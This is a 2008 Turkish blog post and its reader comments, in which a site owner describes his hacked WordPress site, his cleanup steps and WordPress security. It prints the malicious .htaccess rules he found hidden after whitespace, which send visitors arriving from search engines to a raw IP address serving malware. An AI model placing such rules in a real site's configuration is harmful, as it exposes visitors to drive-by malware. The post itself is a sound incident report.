Hacklendik

Bu gün siteme girmeye çalışan Firefox ve Google üzerinden girmeye çalışanların karşılaştığı bir sorun sitem zararlı içerik olduğu için engellenmiş. Aslında tüm arama sitelerinden gelen yönlendirmeler de aynı sorun varmış. En sonunda anladım. Uzun aramalar sonunda http://wordpress.org/support/topic/217700 Bu linkdeki bilgiler doğrultusunda htcaacces içine girilen
yönlendirme kodu nedeni ile yaşamışım bu sorunları.

Ayrıca yazılarımın için yerleştirilmiş bir iframe reklam linkeleri de var tabi.

Yukarıdaki linkdeki işlemleri tek tek yaptım

- htaccess dosyasını sildim.
- ftp şifremi değiştirdim
- hostingh firmamdan sitemin bulnduğu klasörü bir virüs, malware taramasından geçirmelerini istedim.

Sorunun ana nedeni htaccess dosyasında ki kodlar olarak görünüyor. Başta uzunca bir boşluktan sonra aşağıdaki kod yazıyordu.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

Bu arada cute ftp’de htaccess görüntülemeyide öğrendik.
http://blog.youontop.com/server-issues/view-htaccess-hidden-files-in-cuteftp-38.html

Muhtemelen sorun haftasonu benim kalıcı bağlantılarım gittinde oldu ve ben bunu anlamadım. Asıl sorunun ise sitemi yahoo.com’da aradığımda karşılaştım, linke tıkladığımda bilgisayarıma zararlı yazılım eklemeye çalıştı. Zaten yukarıdaki kodda da bu açıkça görülüyor, siteme direk girişlerde değilde arama sonuçlarından gelince yüklenmeye çalışıyor. Ama hesap edemedikleri şey google’un bunu görüp sitemi kapatması. Google’un ve Firefox’un sitemi engellemeleri daha bitmedi. Google Web Yöneticis aracındaki incelemeye alın işaret kutunu işaretledim ve StopBadware.org’daki formuda doldurdum. Neyse hayırlısı bakalım.

Bu durumu gören ve beni uyaran tüm arkadaşlara teşekkürler. Umarım bu tip sorunlarla bi daha karşılaşmayız.

Ek olarak

Ayrıca

http://www.fatihhayrioglu.com/?ref=siteAdi

gibi linkler var. Bunlarıda robots.txt

User-agent: *
Disallow: /*ref=*
Disallow: /*?ref=

kodlarını ekleyerek düzelttim. İşin ilginci bu linkleri google’un arama aracı nasıl buluyor.

43 Yorum (Yorum Ekle)

  • fatih.hayrioglu diyor ki:
    Kasım 29, 2008, 13:38

    @adonis bende anlayamadım.

    Cevapla
  • adonis diyor ki:
    Kasım 28, 2008, 23:58

    Hocam geçmiş olsun… 777 verilmedikten sonra nasıl olurda htaccess dosyasına birşeyler yazlabilir ki?

    Cevapla
  • tasarhane diyor ki:
    Kasım 28, 2008, 12:39

    büyük geçmiş olsun.. ne anladıklarına anlam vermek mümkün değil Ahmet arkadaşımın dediği gibi.
    çok can sıkıcı ya bi kaç kere bende uğraşmak zorunda kaldım.

    Cevapla
  • Kadir GÜNAY’ ın Css, Xhtml, jQuery ve Wordpress Günlüğü » » Derlemeler - 28.11.2008 diyor ki:
    Kasım 28, 2008, 11:20

    [...] Fatih Hayrioğlu’ nun sitesi geçen hafta bir süre kapalı kaldı. Zararlı içerik sorunu yaşadı ve bunu nasıl çözdüğünü anlattı {buradan} [...]

    Cevapla
  • Ahmet Burak Bal Geç diyor ki:
    Kasım 23, 2008, 20:37

    Ne anlıyorlar bilmem. Sanki ellerine bir şey geçiyor. Bir daha yaşanmaması dileğiyle.

    Cevapla
  • fatih.hayrioglu diyor ki:
    Kasım 23, 2008, 13:56

    @turker ben wordpress sürümünü kaldırdım diye biliyorum ama bide wp_head içinden basan bir tane daha varmış onuda kaldırdım.

    Cevapla
  • turker diyor ki:
    Kasım 23, 2008, 03:24

    @Kadir GÜNAY: WordPress ne sıklıkta güvenlik yaması çıkarıyor ve bu yüzden sürüm yükseltiyor, bu yamaların kaçı “çok acil” olarak nitelendirilmiş biraz araştırın.

    daha birkaç sürüm önce wordpressin get ile aldığı veriden beyaz boşlukları silmeden VTye girmesi nedeniye bir sürü sıkıntı yaşandı.

    Ben neden kullanıyorum? Eklentiler yüzünden, yoksa ne wordpressi güvenli nede hızlı bulurum ki hatta çoğu yeri değim yerindeyse çöplük gibi kodlanmıştır. Hatta wordpress mü bu yüzden bol bol eleştiri alır. Malum, yük artınca ilk atlak veren kısım performans oluyor…

    Bildiğiniz, eklenti çeşitliliği ve güncelliği bu kadar fazla olan bir yazılım varsa söyleyiniz, seve seve wordpress yerine kullanabilirim.

    Sürüm gizleme önerimi şu yüzden yapmıştım. WordPress html taglarına sürüm numarasını istatistik tutmak için koyuyor. Tabi wordpress açıklarından faydalanmak isteyenler tek tek siteleri gezmiyorlar. Bu bilgiden faydalanıp botlar ile sürüm kontrolü yapıyorlar.

    Cevapla
  • Necat Bolpaça diyor ki:
    Kasım 20, 2008, 14:32

    FF 3 bir türlü izin vermemişti, Opera ile girip iletişim formundan Fatih Hayrioğlu na ulaşmaya çalıştım.

    Dün veya önceki gün idi, FF e acayip derecede sinirlenmeme sebep olmuştu bu olay :)

    Sorunun giderildiğine sevindim. Şu anki yorumu FF3 içinden yazıyorum.

    Cevapla
  • fatih.hayrioglu diyor ki:
    Kasım 20, 2008, 10:04

    @BAtur Kahveci daha öncesinde aynı hatayı bende almıştım. Ama ilk olarak nereye bakacağımı kestiremedim.

    Cevapla
  • Eray USTA diyor ki:
    Kasım 20, 2008, 05:57

    Hocam çok geçmiş olsun. Diğer arkadaşlara da dikkatli olmaları konusunda bir uyarıda bulunacağım cuteftp de siteleri kayıtlı tutmamaları çok iyi olacaktır..

    Cevapla
« Eski Yorumlar
Yeni Yorumlar »

Yorum yaz

Format: Yorum içinde kullanılabilecek HTML kodları: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

?

Yazı Bilgisi

Bu yazı 18 Kasım Salı 2008 22:15 tarihinde yazılmıştır. , , , , , , etiketleri ile etikenlenmiştir.

Son yazılar